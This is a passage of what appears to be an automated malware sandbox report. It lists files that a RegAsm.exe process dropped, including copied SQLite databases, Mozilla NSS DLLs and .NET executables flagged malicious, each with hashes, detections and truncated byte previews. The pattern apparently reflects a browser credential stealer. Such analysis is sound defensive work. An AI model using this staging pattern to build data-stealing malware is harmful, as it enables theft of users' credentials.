Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\CGHCGIIDGDAKFIEBKFCFIDAFBF

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DBFHDBGIEBFIIDGCBFBKEBFHJD

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8439810553697228
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
MD5:	9D46F142BBCF25D0D495FF1F3A7609D3
SHA1:	629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
SHA-256:	C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
SHA-512:	AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GIEBGIIJDG.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	73216
Entropy (8bit):	7.6619916056452
Encrypted:	false
SSDEEP:	1536:Cnxe3ckl/Q2slz7jHGZI7rBrWMwgN3R29suranxH2ufS/TktxF3s2O6kiz:Cnx0I26z/8uz22gaxH2zT6xFnO6Jz
MD5:	8C46913FBA5CA6A0CB8C4E839EF3A3AE
SHA1:	95EFA5E6909359A0D30E95B8EEAD7D0116F8B693
SHA-256:	1268E903700241813C51A97AF8513C97306FCDC6987F4C7E2E0EC02EB71BD6CB
SHA-512:	B011191A827D75C9018D50BA3DF0BA045BB4EF8000711DCDD1B117F9D257B2FE1F9722C38FE61BCABCCA58DBE281FD7605F43CA3B339B428BCC6F5C3A5B8EC6E
Malicious:	true
Yara Hits:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\ProgramData\GIEBGIIJDG.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............."... ...@....@.. ....................................`..................................!..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................!......H.......t...D%...........,...............................................(".....(....6.\|.....(0...Vs1...r...p(....(2...Js1....s3....(4...Zr...p(....(.....oE.....(N...:....r...p(.....r&..p(....(O...(.....r...p(....(....r...p(....oE...:....r...p(....r...p(.....rM..p(.....{....rM..p(....(R...oS...(T...b.:....r...p(.....oU....0..n.........(.....s....(....r...po....(.....s.......o.......o.......o......o..........io.......o.....(......o......+......0../.........(....}

C:\ProgramData\HDGIEBGH

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JECAEHJJJKJKFIDGCBGIJJJEHI

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JKEHIIJJECFHJKECFHDG

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KECGDBFCBKFIDHIDHDHI

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KFIJEGCB

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KJEHJKJEBGHJJKEBGIECAAFIJK

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03859996294213402
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
MD5:	D2A38A463B7925FE3ABE31ECCCE66ACA
SHA1:	A1824888F9E086439B287DEA497F660F3AA4B397
SHA-256:	474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
SHA-512:	62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\userAFHDHCAAKE.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	413224
Entropy (8bit):	7.989371105778008
Encrypted:	false
SSDEEP:	12288:WFVCXJfc+aP2LQB0g7YUsKEJGxhimXJEO:MCX2d+LQqbKEJQim5t
MD5:	F73186DF5A030CF7F186B0737C3AF1F7
SHA1:	D15E45FEEFBBC010DB92AE897D80BC7419C0D046
SHA-256:	05C67A9765FE1EBEBCEDAEE376F87A803D7CD37E6C5C19F7D336C2F14A4EF207
SHA-512:	A6E4D6E34748FA8FB9153E2104CF49CC36AF9B22E29C8DF050DE0DB4E14E9DD18ED178B4BBACD6289A0A55B465C996FB931799BA970DFE559C85215DB7E31DF1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 42%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................><... ...@....@.. ....................................`..................................;..S....@...............(..(&...`.......:............................................... ............... ..H............text...D.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......&..............@..B................ <......H..........0...............................................................^.8=..Q..v A.3[R.J.._....f..9.\l..vC#SsnB~.E..~.i..7.}+.V...#..8..f.#XW....b...(..............<O.......1.$.=UN8.)..LL....(K....,r.....%9.L.Y.=0..T4.&.....d....(U....'="...(>.d..+..92...p8.1..Pa\q....]X./a.@0C.PQ...B...v..6....le2....4I3.......P.C:...v.}.Q.wp..S(A.Qg.'..N.._X.mvg...J/J6.^...D^MI.O4.5.+....e...^.DIf?.1$;7..x...M..q.q.{'...I..CN.n...a.P.8....!0..\.^.'...3.._....,\

C:\Users\userBGIJEGCGDG.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	73216
Entropy (8bit):	7.6619916056452
Encrypted:	false
SSDEEP:	1536:Cnxe3ckl/Q2slz7jHGZI7rBrWMwgN3R29suranxH2ufS/TktxF3s2O6kiz:Cnx0I26z/8uz22gaxH2zT6xFnO6Jz
MD5:	8C46913FBA5CA6A0CB8C4E839EF3A3AE
SHA1:	95EFA5E6909359A0D30E95B8EEAD7D0116F8B693
SHA-256:	1268E903700241813C51A97AF8513C97306FCDC6987F4C7E2E0EC02EB71BD6CB
SHA-512:	B011191A827D75C9018D50BA3DF0BA045BB4EF8000711DCDD1B117F9D257B2FE1F9722C38FE61BCABCCA58DBE281FD7605F43CA3B339B428BCC6F5C3A5B8EC6E
Malicious:	true
Yara Hits:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\userBGIJEGCGDG.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............."... ...@....@.. ....................................`..................................!..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................!......H.......t...D%...........,...............................................(".....(....6.\|.....(0...Vs1...r...p(....(2...Js1....s3....(4...Zr...p(....(.....oE.....(N...:....r...p(.....r&..p(....(O...(.....r...p(....(....r...p(....oE...:....r...p(....r...p(.....rM..p(.....{....rM..p(....(R...oS...(T...b.:....r...p(.....oU....0..n.........(.....s....(....r...po....(.....s.......o.......o.......o......o..........io.......o.....(......o......+......0../.........(....}

C:\Users\userGCAEHDBAAE.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	385064
Entropy (8bit):	7.98819744237574
Encrypted:	false
SSDEEP:	6144:bymTbhLAP1TbvdrXIFTjCUBfmfq1VpIe+kUWLD38DEVhyF2tLooTPbJBJaINPK7z:bymTiJVr4FTjCUVsq1we++D3FU2CW7aT
MD5:	47697A60A96C5ADEF362D8DA9A274B7D
SHA1:	16DBC512F121C27E2CB48A61D6DCF166AA792E0D
SHA-256:	63D86693917598DF88D518C057C7680B5BD2DE9ADD384425F81EAD95EEE18DBA
SHA-512:	4F18DB753FBD9F08842630DD2AC97DC6B368269C80DFC8A2F880BAA80010DB013C8168A6C19465F5D843AE135B162A63EB2DC1C48EA93C5B255868C77C591A17
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$..f............................>.... ........@.. ....................... ............`.....................................S.......................(&........................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H...........0............................................................y.YYl.v^...5f.H$...../.W.a.zz..5O..7...f..S.l\.RB.k.5...Eq.....v......B...f............9v...;(.F. .J.g.i..(....B.B.M.s...<..ub. .l.].....Qg...\.Bc.....$........fVGZ.........8....lH;!..."......p.UO.8.Y"....d..\...dD".sm}.c#.?.4?..Y#.......0....VS..X..\|....G...g.:!rM[~...e.Bp..bz.{....`5......\|..\|b.O....G......A.h...}s8...W.PaG?...U.K%.9].\|.....wc\\|..B..K=.D..u..G.@..q...y0g...5..i.......<

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\BKFHCGIDBA.exe.log

Download File

Process:	C:\ProgramData\BKFHCGIDBA.exe
File Type:	CSV text
Category:	modified
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\BKJJEBKKEH.exe.log

Download File

Process:	C:\ProgramData\BKJJEBKKEH.exe
File Type:	CSV text
Category:	modified
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\GIEBGIIJDG.exe.log

Download File

Process:	C:\ProgramData\GIEBGIIJDG.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	226
Entropy (8bit):	5.360398796477698
Encrypted:	false
SSDEEP:	6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
MD5:	3A8957C6382192B71471BD14359D0B12
SHA1:	71B96C965B65A051E7E7D10F61BEBD8CCBB88587
SHA-256:	282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
SHA-512:	76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\userAFHDHCAAKE.exe.log

Download File

Process:	C:\Users\userAFHDHCAAKE.exe
File Type:	CSV text
Category:	modified
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
